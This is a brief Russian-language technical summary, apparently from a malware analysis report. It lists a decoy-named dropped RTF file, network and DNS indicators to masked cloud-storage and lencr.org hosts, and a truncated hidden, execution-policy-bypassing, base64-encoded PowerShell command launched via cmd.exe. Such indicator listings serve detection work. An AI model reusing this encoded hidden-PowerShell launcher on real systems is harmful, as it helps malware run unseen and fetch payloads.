Техническая информация
- C:\users\public\microsof_office.rtf
- 'pp##.###1.vultrobjects.com':443
- 'x1.#.lencr.org':80
- http://x1.#.lencr.org/
- 'pp##.###1.vultrobjects.com':443
- DNS ASK pp##.###1.vultrobjects.com
- DNS ASK x1.#.lencr.org
- '<SYSTEM32>\cmd.exe' /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoADIAIAA9ACAAJABFAG4AdgA6AHQAZQBtAHAAKwAnAFwAbwBrAC4AdAB4AHQALgB0AHgAdAAnADsAIAAkAGMAbABpAGUAbgB0ADIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAg... (со скрытым окном)